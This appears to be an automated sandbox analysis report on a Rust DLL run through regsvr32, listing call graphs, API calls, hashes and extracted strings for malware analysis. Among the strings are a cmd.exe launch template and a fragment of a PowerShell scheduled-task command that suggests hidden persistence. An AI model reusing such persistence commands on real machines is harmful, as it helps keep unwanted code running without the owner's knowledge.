7ffdfb25b3eb 36526->36452 36625 7ffdfb25b8c0 36527->36625 36528 7ffdfb25b37a 36528->36526 36643 7ffdfb264290 85 API calls 36528->36643 36531 7ffdfb25ac30 97 API calls 36530->36531 36533 7ffdfb25a972 36531->36533 36532 7ffdfb25b310 94 API calls 36532->36533 36533->36532 36534 7ffdfb25a9a6 36533->36534 36537 7ffdfb25aab6 36533->36537 36534->36537 36538 7ffdfb25aa8b 36534->36538 36649 7ffdfb25db50 94 API calls 36534->36649 36537->36452 36538->36537 36650 7ffdfb25b670 HeapFree SwitchToThread 36538->36650 36540 7ffdfb234cc0 36539->36540 36541 7ffdfb228be0 162 API calls 36540->36541 36543 7ffdfb234e4d 36540->36543 36542 7ffdfb234d3a 36541->36542 36544 7ffdfb234dc8 36542->36544 36546 7ffdfb234d9d 36542->36546 36547 7ffdfb234d5c 36542->36547 36545 7ffdfb20a8e0 HeapFree 36543->36545 36550 7ffdfb234e73 36543->36550 36544->36543 36549 7ffdfb234dec 36544->36549 36545->36550 36546->36544 36551 7ffdfb20a8e0 HeapFree 36546->36551 36547->36544 36651 7ffdfb227b90 HeapFree 36547->36651 36548 7ffdfb234e3b 36548->36452 36549->36548 36652 7ffdfb2189c0 HeapFree 36549->36652 36552 7ffdfb302850 6 API calls 36550->36552 36551->36544 36555 7ffdfb234ef3 36552->36555 36556 7ffdfb234f95 36555->36556 36557 7ffdfb235047 36555->36557 36559 7ffdfb234f97 36555->36559 36560 7ffdfb234f8c 36555->36560 36556->36557 36563 7ffdfb234fe6 36556->36563 36558 7ffdfb20a8e0 HeapFree 36557->36558 36564 7ffdfb23506d 36557->36564 36558->36564 36559->36556 36566 7ffdfb20a8e0 HeapFree 36559->36566 36653 7ffdfb2296b0 36560->36653 36562 7ffdfb235035 36562->36452 36563->36562 36658 7ffdfb2189c0 HeapFree 36563->36658 36565 7ffdfb302850 6 API calls 36564->36565 36569 7ffdfb2350e5 36565->36569 36566->36556 36568 7ffdfb2352c2 36570 7ffdfb235334 36568->36570 36702 7ffdfb2189c0 HeapFree 36568->36702 36569->36568 36659 7ffdfb2330d0 36569->36659 36574 7ffdfb302850 6 API calls 36570->36574 36573 7ffdfb2351cd 36700 7ffdfb233d90 HeapFree 36573->36700 36576 7ffdfb23537b 36574->36576 36703 7ffdfb2a61d0 75 API calls 36576->36703 36577 7ffdfb235206 36577->36568 36580 7ffdfb235246 36577->36580 36578 7ffdfb2352a1 36578->36452 36580->36578 36701 7ffdfb2189c0 HeapFree 36580->36701 36581 7ffdfb235388 36581->36452 36584 7ffdfb235983 36583->36584 36585 7ffdfb235aec 36584->36585 36586 7ffdfb235a1b 36584->36586 36712 7ffdfb2a61d0 75 API calls 36585->36712 36587 7ffdfb2330d0 162 API calls 36586->36587 36589 7ffdfb235a69 36587->36589 36710 7ffdfb233d90 HeapFree 36589->36710 36591 7ffdfb235aa2 36711 7ffdfb2343d0 WaitOnAddress GetLastError 36591->36711 36593 7ffdfb235acb 36593->36452 36594->36452 36595->36514 36597 7ffdfb25cba0 36596->36597 36598 7ffdfb25cc83 36597->36598 36599 7ffdfb25cbb5 TlsGetValue 36597->36599 36602 7ffdfb25cc88 TlsGetValue 36598->36602 36600 7ffdfb25b329 36599->36600 36601 7ffdfb25cbc8 36599->36601 36600->36520 36600->36527 36601->36600 36603 7ffdfb25cbf0 36601->36603 36604 7ffdfb263090 2 API calls 36601->36604 36602->36600 36602->36601 36606 7ffdfb20a8d0 HeapAlloc 36603->36606 36605 7ffdfb25cbe8 36604->36605 36607 7ffdfb262e00 74 API calls 36605->36607 36608 7ffdfb25cc0c 36606->36608 36607->36603 36609 7ffdfb25cc9d 36608->36609 36610 7ffdfb25cc15 TlsGetValue TlsSetValue 36608->36610 36611 7ffdfb2dead0 72 API calls 36609->36611 36610->36600 36612 7ffdfb25cc3a 36610->36612 36613 7ffdfb25ccac 36611->36613 36614 7ffdfb25cc61 36612->36614 36644 7ffdfb264290 85 API calls 36612->36644 36616 7ffdfb20a8e0 HeapFree 36613->36616 36615 7ffdfb20a8e0 HeapFree 36614->36615 36615->36600 36618 7ffdfb25ccc4 36616->36618 36619 7ffdfb302850 6 API calls 36618->36619 36620 7ffdfb25cccc 36619->36620 36621 7ffdfb25ccf6 36620->36621 36645 7ffdfb264290 85 API calls 36620->36645 36623 7ffdfb302850 6 API calls 36621->36623 36624 7ffdfb25ccfe 36623->36624 36626 7ffdfb25ba70 91 API calls 36625->36626 36627 7ffdfb25b8cb 36626->36627 36628 7ffdfb263090 2 API calls 36627->36628 36634 7ffdfb25b8d0 36627->36634 36629 7ffdfb25b94a 36628->36629 36630 7ffdfb262e00 74 API calls 36629->36630 36631 7ffdfb25b952 36630->36631 36633 7ffdfb25b96b 36631->36633 36631->36634 36641 7ffdfb25b8e9 36633->36641 36646 7ffdfb264290 85 API calls 36633->36646 36634->36641 36647 7ffdfb25bad0 88 API calls 36634->36647 36635 7ffdfb25ba21 36636 7ffdfb25ba48 36635->36636 36648 7ffdfb264290 85 API calls 36635->36648 36639 7ffdfb302850 6 API calls 36636->36639 36640 7ffdfb25ba69 36639->36640 36641->36528 36642->36527 36643->36526 36644->36614 36645->36621 36646->36641 36647->36635 36648->36636 36649->36534 36650->36538 36651->36547 36652->36548 36654 7ffdfb229744 36653->36654 36657 7ffdfb2296c7 36653->36657 36654->36556 36656 7ffdfb20a8e0 HeapFree 36656->36657 36657->36654 36657->36656 36704 7ffdfb2247a0 HeapFree 36657->36704 36658->36562 36660 7ffdfb23318d 36659->36660 36663 7ffdfb23319b 36659->36663 36705 7ffdfb217ea0 93 API calls 36660->36705 36662 7ffdfb233228 36664 7ffdfb228be0 162 API calls 36662->36664 36663->36662 36665 7ffdfb260d70 8 API calls 36663->36665 36671 7ffdfb23328a 36664->36671 36665->36662 36666 7ffdfb217ce0 93 API calls 36666->36671 36667 7ffdfb23337e 36667->36573 36668 7ffdfb2333b4 36670 7ffdfb231c90 162 API calls 36668->36670 36669 7ffdfb218140 90 API calls 36669->36671 36670->36667 36671->36666 36671->36668 36671->36669 36672 7ffdfb23334b 36671->36672 36673 7ffdfb23332a 36671->36673 36672->36667 36706 7ffdfb234170 HeapFree 36672->36706 36673->36672 36675 7ffdfb25a730 162 API calls 36673->36675 36675->36672 36676 7ffdfb2334ee 36677 7ffdfb302850 6 API calls 36676->36677 36678 7ffdfb23350b 36677->36678 36680 7ffdfb2335ee 36678->36680 36707 7ffdfb217ea0 93 API calls 36678->36707 36681 7ffdfb260d70 8 API calls 36680->36681 36690 7ffdfb233678 36680->36690 36681->36690 36682 7ffdfb233782 36687 7ffdfb23381f 36682->36687 36689 7ffdfb23395d 36682->36689 36683 7ffdfb217ce0 93 API calls 36683->36690 36684 7ffdfb233877 36684->36573 36685 7ffdfb2338ae 36708 7ffdfb231f70 7 API calls 36685->36708 36686 7ffdfb218140 90 API calls 36686->36690 36687->36684 36691 7ffdfb20a8e0 HeapFree 36687->36691 36709 7ffdfb234040 HeapFree 36689->36709 36690->36682 36690->36683 36690->36685 36690->36686 36692 7ffdfb233761 36690->36692 36691->36687 36692->36682 36694 7ffdfb25a730 162 API calls 36692->36694 36694->36682 36695 7ffdfb233a0f 36696 7ffdfb233a20 36695->36696 36698 7ffdfb211360 HeapFree 36695->36698 36697 7ffdfb302850 6 API calls 36696->36697 36699 7ffdfb233a28 36697->36699 36698->36696 36700->36577 36701->36578 36702->36570 36703->36581 36704->36657 36705->36663 36706->36676 36707->36680 36708->36684 36709->36695 36710->36591 36711->36593 36712->36589 36713->36476 36714->36481 36715->36484 36716 7ffdfb228997 36717 7ffdfb2289a0 36716->36717 36718 7ffdfb228a54 36716->36718 36720 7ffdfb228a6a 36717->36720 36722 7ffdfb228a3a 36717->36722 36725 7ffdfb2280c0 2 API calls 36717->36725 36719 7ffdfb2deab0 72 API calls 36718->36719 36719->36722 36721 7ffdfb2deab0 72 API calls 36720->36721 36724 7ffdfb228a6f 36721->36724 36723 7ffdfb2deab0 72 API calls 36722->36723 36726 7ffdfb228a41 36722->36726 36723->36720 36725->36722 36727 7ffdfb220b68 36728 7ffdfb220b74 36727->36728 36729 7ffdfb220dd5 36727->36729 36730 7ffdfb20a8d0 HeapAlloc 36728->36730 36732 7ffdfb220bcf 36730->36732 36731 7ffdfb220c49 NtQuerySystemInformation 36731->36732 36732->36731 36733 7ffdfb220d9c 36732->36733 36733->36729 36734 7ffdfb20a8e0 HeapFree 36733->36734 36734->36729 36735 7ffdfb2094ea 36737 7ffdfb209520 36735->36737 36736 7ffdfb20a8e0 HeapFree 36736->36737 36737->36736 36738 7ffdfb20a8e0 HeapFree 36737->36738 36740 7ffdfb20971f 36737->36740 36741 7ffdfb209730 36737->36741 36739 7ffdfb209690 RtlFreeHeap 36738->36739 36739->36737 36744 7ffdfb208e20 36740->36744 36747 7ffdfb213b10 CloseHandle 36744->36747 36746 7ffdfb208e31 RtlFreeHeap 36746->36741 36747->36746 36748 7ffdfb224049 36760 7ffdfb223500 36748->36760 36751 7ffdfb2296b0 HeapFree 36752 7ffdfb224060 36751->36752 36753 7ffdfb302850 6 API calls 36752->36753 36757 7ffdfb224068 36753->36757 36754 7ffdfb224296 36755 7ffdfb224258 36755->36754 36764 7ffdfb227b90 HeapFree 36755->36764 36756 7ffdfb224214 memcpy 36756->36757 36757->36754 36757->36755 36757->36756 36758 7ffdfb20a8e0 HeapFree 36757->36758 36758->36757 36761 7ffdfb223590 36760->36761 36762 7ffdfb223519 36760->36762 36761->36751 36762->36761 36763 7ffdfb20a8e0 HeapFree 36762->36763 36763->36762 36764->36755 36765 7ffdfb220d8c 36766 7ffdfb20f280 88 API calls 36765->36766 36774 7ffdfb220d96 36766->36774 36767 7ffdfb221146 36778 7ffdfb20bee0 36767->36778 36769 7ffdfb220f49 memcpy 36783 7ffdfb2267e0 80 API calls 36769->36783 36772 7ffdfb221175 36773 7ffdfb20a8e0 HeapFree 36773->36772 36774->36767 36774->36769 36775 7ffdfb20a8e0 HeapFree 36774->36775 36776 7ffdfb221139 36774->36776 36775->36774 36776->36774 36784 7ffdfb218c70 CloseHandle 36776->36784 36779 7ffdfb20bf10 36778->36779 36780 7ffdfb20bf2a 36779->36780 36782 7ffdfb20bf16 36779->36782 36780->36772 36780->36773 36782->36779 36785 7ffdfb20b7c0 HeapFree CloseHandle 36782->36785 36783->36774 36784->36776 36785->36782

                                                                    Executed Functions

                                                                    Function 00007FFDFB2AFC30 Relevance: 110.4, APIs: 51, Strings: 10, Instructions: 3612COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$EnvironmentErrorFreeLastStringsmemcpy
                                                                    • String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$PATHstd\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
                                                                    • API String ID: 3975177916-1077193248
                                                                    • Opcode ID: ba1096540c7540645495dfa36d7aae2386e001769c8719bd2c118a7c909b1bde
                                                                    • Instruction ID: 21bf385a0898185ac14a2bd794c1e083d290b1d1ed0715c96a6c14040f8690c6
                                                                    • Opcode Fuzzy Hash: ba1096540c7540645495dfa36d7aae2386e001769c8719bd2c118a7c909b1bde
                                                                    • Instruction Fuzzy Hash: 8573A862B1AAD389EB709F25D8607F92760FB04789F448135CE6D9BBEDDF3892418700
                                                                    Function 00007FFDFB21DBC0 Relevance: 39.5, APIs: 20, Strings: 2, Instructions: 974memorytimenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • Unable to read process memory informationReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\process.rs, xrefs: 00007FFDFB21E873
                                                                    • ), xrefs: 00007FFDFB21E87F
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Process$InformationMemoryQueryRead$TimesToken$HeapVirtual$AllocCloseCountersFileHandleModuleNameOpenSystemmemcpymemset
                                                                    • String ID: )$Unable to read process memory informationReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\process.rs
                                                                    • API String ID: 389343282-4288831377
                                                                    • Opcode ID: 8857f9efc52670e43b70f703aa61541305eb4361517dbd41628f14e8ea00ce29
                                                                    • Instruction ID: c40737c02a9809e377a50a6bee3e837fea632fc13978ce9d0728e5580eb76c29
                                                                    • Opcode Fuzzy Hash: 8857f9efc52670e43b70f703aa61541305eb4361517dbd41628f14e8ea00ce29
                                                                    • Instruction Fuzzy Hash: BFA2A622B0AA8391EB74AB15E820BBA67A0FF45784F445535DAAD937EDDF3CE444C700
                                                                    Function 00007FFDFB204760 Relevance: 32.6, APIs: 11, Strings: 7, Instructions: 1074memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$ErrorHeapLast$AllocFree
                                                                    • String ID: $-$1$Pgy~$a Display implementation returned an error unexpectedly/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs$not yet implemented$tes 1)) -TaskName '' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)
                                                                    • API String ID: 2977971772-935880289
                                                                    • Opcode ID: 83f77a5db162ac7926c7f3f0995e1b4223b1c9889a58ce84648d1b6940cc856b
                                                                    • Instruction ID: b4810fa26776c22f6d4ea45b9526e9cd80f44e50a7934df13428e631886e31c4
                                                                    • Opcode Fuzzy Hash: 83f77a5db162ac7926c7f3f0995e1b4223b1c9889a58ce84648d1b6940cc856b
                                                                    • Instruction Fuzzy Hash: 83C25C3670EAC285EB709B11E490BEAB7A0EB85780F548126DADD47BADDF7CD145CB00
                                                                    Function 00007FFDFB20185D Relevance: 15.6, APIs: 7, Strings: 1, Instructions: 1649COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID: 2Pz\
                                                                    • API String ID: 1475443563-2698464549
                                                                    • Opcode ID: 75670cabc425f8fffa7c9766c47395dec9cd841e19bce0a28a32af43702aeda1
                                                                    • Instruction ID: 60c1c14f64c28434bfe357fed50b6fd8fbb2f848e859c4782fc66e5c6eae0971
                                                                    • Opcode Fuzzy Hash: 75670cabc425f8fffa7c9766c47395dec9cd841e19bce0a28a32af43702aeda1
                                                                    • Instruction Fuzzy Hash: B1F2952670978286EB209B25A4607AA77A1FBD9BC4F444335EEDD53BADDF3CD2018704
                                                                    Function 00007FFDFB2AE2E0 Relevance: 12.5, APIs: 8, Instructions: 513COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2240 7ffdfb2ae2e0-7ffdfb2ae348 call 7ffdfb30208c 2243 7ffdfb2ae350-7ffdfb2ae362 GetCurrentProcessId 2240->2243 2244 7ffdfb2ae398-7ffdfb2ae417 call 7ffdfb2e0010 2243->2244 2245 7ffdfb2ae364 2243->2245 2249 7ffdfb2ae419-7ffdfb2ae429 call 7ffdfb20a8e0 2244->2249 2250 7ffdfb2ae42e-7ffdfb2ae458 2244->2250 2247 7ffdfb2ae370-7ffdfb2ae396 ProcessPrng 2245->2247 2247->2244 2247->2247 2249->2250 2252 7ffdfb2ae45a-7ffdfb2ae460 2250->2252 2253 7ffdfb2ae470-7ffdfb2ae48b 2250->2253 2254 7ffdfb2ae490-7ffdfb2ae4a1 2252->2254 2255 7ffdfb2ae462-7ffdfb2ae469 2252->2255 2256 7ffdfb2ae545-7ffdfb2ae565 call 7ffdfb20a8d0 2253->2256 2259 7ffdfb2ae4a3-7ffdfb2ae4b2 2254->2259 2260 7ffdfb2ae4e2-7ffdfb2ae4ea 2254->2260 2258 7ffdfb2ae4ed-7ffdfb2ae4f2 2255->2258 2265 7ffdfb2ae9b7-7ffdfb2ae9bf call 7ffdfb2deab0 2256->2265 2266 7ffdfb2ae56b-7ffdfb2ae585 2256->2266 2264 7ffdfb2ae4f4-7ffdfb2ae534 2258->2264 2262 7ffdfb2ae4b8-7ffdfb2ae4db 2259->2262 2263 7ffdfb2ae806-7ffdfb2ae818 2259->2263 2260->2258 2262->2258 2268 7ffdfb2ae4dd 2262->2268 2263->2258 2267 7ffdfb2ae81e-7ffdfb2ae847 2263->2267 2269 7ffdfb2ae53a-7ffdfb2ae541 2264->2269 2270 7ffdfb2ae9b4 2264->2270 2273 7ffdfb2ae9c4-7ffdfb2ae9cd 2265->2273 2272 7ffdfb2ae5a0-7ffdfb2ae5a3 2266->2272 2267->2264 2268->2267 2269->2256 2270->2265 2274 7ffdfb2ae5a5-7ffdfb2ae5a8 2272->2274 2275 7ffdfb2ae600-7ffdfb2ae605 2272->2275 2276 7ffdfb2ae9cf 2273->2276 2277 7ffdfb2ae9f2-7ffdfb2aea02 2273->2277 2278 7ffdfb2ae5aa-7ffdfb2ae5ac 2274->2278 2279 7ffdfb2ae5e0-7ffdfb2ae5e4 2274->2279 2280 7ffdfb2ae60b-7ffdfb2ae61e 2275->2280 2281 7ffdfb2ae760-7ffdfb2ae7a0 call 7ffdfb30201c 2275->2281 2284 7ffdfb2aea1c-7ffdfb2aea7f call 7ffdfb302850 ReadFileEx 2276->2284 2285 7ffdfb2aea0f-7ffdfb2aea12 2277->2285 2286 7ffdfb2aea04-7ffdfb2aea0a call 7ffdfb20a8e0 2277->2286 2288 7ffdfb2ae5ae-7ffdfb2ae5b1 2278->2288 2279->2275 2289 7ffdfb2ae5e6-7ffdfb2ae5ed 2279->2289 2282 7ffdfb2ae690-7ffdfb2ae695 2280->2282 2283 7ffdfb2ae620-7ffdfb2ae627 2280->2283 2303 7ffdfb2ae7a6-7ffdfb2ae7b1 GetLastError 2281->2303 2304 7ffdfb2ae8c0-7ffdfb2ae8c3 2281->2304 2293 7ffdfb2ae595-7ffdfb2ae59d 2282->2293 2290 7ffdfb2ae62d-7ffdfb2ae643 2283->2290 2291 7ffdfb2ae994 2283->2291 2312 7ffdfb2aea81 2284->2312 2313 7ffdfb2aeac2-7ffdfb2aead1 GetLastError 2284->2313 2285->2284 2294 7ffdfb2aea14-7ffdfb2aea17 CloseHandle 2285->2294 2286->2285 2297 7ffdfb2ae590-7ffdfb2ae593 2288->2297 2298 7ffdfb2ae5b3-7ffdfb2ae5de 2288->2298 2299 7ffdfb2ae6ca-7ffdfb2ae6da 2289->2299 2300 7ffdfb2ae5f3-7ffdfb2ae5fa 2289->2300 2301 7ffdfb2ae645 2290->2301 2302 7ffdfb2ae64b-7ffdfb2ae64e 2290->2302 2305 7ffdfb2ae9a9-7ffdfb2ae9b2 call 7ffdfb2deab0 2291->2305 2293->2272 2294->2284 2297->2293 2298->2283 2307 7ffdfb2ae717-7ffdfb2ae720 2299->2307 2308 7ffdfb2ae6dc-7ffdfb2ae6ec 2299->2308 2300->2288 2301->2302 2302->2291 2309 7ffdfb2ae654-7ffdfb2ae669 2302->2309 2310 7ffdfb2ae7b7-7ffdfb2ae7ba 2303->2310 2311 7ffdfb2ae84c-7ffdfb2ae866 2303->2311 2315 7ffdfb2ae8c5-7ffdfb2ae8d4 call 7ffdfb20a8e0 2304->2315 2316 7ffdfb2ae8d9-7ffdfb2ae932 call 7ffdfb2a8350 2304->2316 2305->2273 2317 7ffdfb2ae727-7ffdfb2ae736 2307->2317 2308->2317 2318 7ffdfb2ae6ee-7ffdfb2ae70e 2308->2318 2309->2305 2324 7ffdfb2ae66f-7ffdfb2ae67f 2309->2324 2327 7ffdfb2ae7bc-7ffdfb2ae7c2 2310->2327 2328 7ffdfb2ae7d0-7ffdfb2ae7d3 2310->2328 2325 7ffdfb2ae868-7ffdfb2ae877 call 7ffdfb20a8e0 2311->2325 2326 7ffdfb2ae87c-7ffdfb2ae883 2311->2326 2329 7ffdfb2aea90-7ffdfb2aeaa3 SleepEx 2312->2329 2322 7ffdfb2aead4-7ffdfb2aeae0 2313->2322 2315->2316 2333 7ffdfb2ae937-7ffdfb2ae93a 2316->2333 2320 7ffdfb2ae738-7ffdfb2ae755 2317->2320 2321 7ffdfb2ae710 2317->2321 2318->2320 2318->2321 2320->2281 2321->2307 2331 7ffdfb2aeaf4-7ffdfb2aeb00 2322->2331 2332 7ffdfb2aeae2-7ffdfb2aeaf2 call 7ffdfb2b62f0 2322->2332 2334 7ffdfb2ae69a 2324->2334 2335 7ffdfb2ae681-7ffdfb2ae68e 2324->2335 2325->2326 2337 7ffdfb2ae897-7ffdfb2ae89b 2326->2337 2338 7ffdfb2ae885-7ffdfb2ae892 call 7ffdfb20a8e0 2326->2338 2339 7ffdfb2ae7dd-7ffdfb2ae7e7 2327->2339 2328->2311 2340 7ffdfb2ae7d5-7ffdfb2ae7db 2328->2340 2329->2329 2341 7ffdfb2aeaa5-7ffdfb2aeabc 2329->2341 2345 7ffdfb2aeb04-7ffdfb2aeb10 2331->2345 2332->2345 2343 7ffdfb2ae93c-7ffdfb2ae952 2333->2343 2344 7ffdfb2ae95d-7ffdfb2ae977 2333->2344 2347 7ffdfb2ae69c-7ffdfb2ae6b5 call 7ffdfb27b820 2334->2347 2335->2347 2349 7ffdfb2ae8a5-7ffdfb2ae8bf 2337->2349 2350 7ffdfb2ae89d-7ffdfb2ae8a0 CloseHandle 2337->2350 2338->2337 2339->2243 2346 7ffdfb2ae7ed-7ffdfb2ae801 call 7ffdfb20a8e0 2339->2346 2340->2311 2340->2339 2341->2322 2351 7ffdfb2aeabe-7ffdfb2aeac0 2341->2351 2343->2338 2354 7ffdfb2ae958 2343->2354 2344->2349 2355 7ffdfb2ae97d-7ffdfb2ae98f call 7ffdfb20a8e0 2344->2355 2346->2243 2361 7ffdfb2ae996-7ffdfb2ae9a5 2347->2361 2362 7ffdfb2ae6bb-7ffdfb2ae6c5 2347->2362 2350->2349 2351->2345 2354->2337 2355->2349 2361->2305 2362->2293
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentPrng
                                                                    • String ID:
                                                                    • API String ID: 716580790-0
                                                                    • Opcode ID: 16b35659de58f62212754a2bee746a30cdd65fbf360830230b8dc60c33c43456
                                                                    • Instruction ID: 78da821a8b2645110738e7be7791413b5d202e5138f9f212012ece86c6e63259
                                                                    • Opcode Fuzzy Hash: 16b35659de58f62212754a2bee746a30cdd65fbf360830230b8dc60c33c43456
                                                                    • Instruction Fuzzy Hash: 7A22F632B06A939AE754BF21D8207F93B94BB44798F244635DA6D8B7E9DF3CD5428300
                                                                    Function 00007FFDFB20F280 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 497COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
